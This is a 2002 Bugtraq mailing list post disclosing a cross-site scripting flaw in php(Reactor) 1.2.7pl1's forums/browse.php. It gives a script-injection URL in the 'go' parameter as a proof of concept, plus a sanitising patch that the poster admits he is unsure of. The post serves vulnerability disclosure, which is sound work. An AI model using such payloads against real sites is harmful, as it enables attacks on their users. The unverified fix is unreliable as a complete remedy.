Home page logo
/

bugtraq logo Bugtraq mailing list archives

XSS bug in php(Reactor)
From: Arab VieruZ <arabviersus () hotmail com>
Date: 10 Oct 2002 12:43:11 -0000



Vulnerable systems:
1.2.7pl1

Exploit:
forums/browse.php?fid=3&tid=46&go=<scri*pt>JavaScript:alert
('Hi');</scri*pt>

(with out "*")

Solution:
i thought this but i am not sure

open browse.php and add this code in line 52:

$go = HTMLSpecialChars($go);
$go = PREG_Replace("/[A-Z&.;:()~! () #$%^''*\{\}\/]/i", "", $go);

----------------------------------
Arab Vieruz

thanx




  By Date           By Thread  

Current thread:
  • XSS bug in php(Reactor) Arab VieruZ (Oct 10)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault